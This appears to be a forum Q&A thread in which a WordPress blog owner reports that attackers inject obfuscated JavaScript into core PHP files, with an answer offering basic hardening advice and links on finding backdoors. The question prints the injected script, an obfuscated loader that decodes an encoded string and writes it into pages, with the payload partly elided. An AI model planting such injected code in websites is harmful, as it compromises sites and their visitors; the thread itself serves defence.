I have a blog created with WordPress, and now I have a problem. Attackers write JavaScript code into my files.

Let’s assume I have holes in my plugin scripts, but how can they write into PHP files?

Here is part of the list of PHP files into which they write the script:
(index.php, wp-activate.php, wp-comments-post.php, wp-settings.php ...)

And this is the JavaScript they write into them:

<script type="text/javascript" language="javascript">kxjwm="225222 ... 2";madds=100;wljam=this;cjayr="i"+"te";geijt=116;fsmuj="wr"+cjayr;for(yadii in wljam){if(yadii.length==8 && yadii.charCodeAt(0)==madds && yadii.charCodeAt(7)==geijt){break;}}o="";bqcqp=0;qczew=wljam[yadii];dlhge=53;while (bqcqp<kxjwm.length){voxhw=0;for(evedn=0;evedn<8;evedn++){voxhw=voxhw<<1;if(kxjwm.charCodeAt(bqcqp+evedn)==dlhge){voxhw++;}}bqcqp=bqcqp+3;qczew[fsmuj](String.fromCharCode(voxhw));bqcqp=bqcqp+5;}</script>

How can I prevent such attacks?

I haven’t any experience with WordPress, so any help will be very nice.

Thanks much

2 Answers
2

Hi @Syom:

Often hackers get access because you use the name “admin” for your administrator and you have an easy-to-hack password. Or because you don’t update your software and they leverage some of the security holes that have been found and patched.

Here’s a set of slides that go in depth explaining how to secure your WordPress site, which were just presented at WordCamp Phoenix this past weekend:

  • WordPress End-User Security

Here are some blog posts by Otto on the subject:

  • How to find a backdoor in a hacked WordPress
  • Anatomy of a Theme Malware
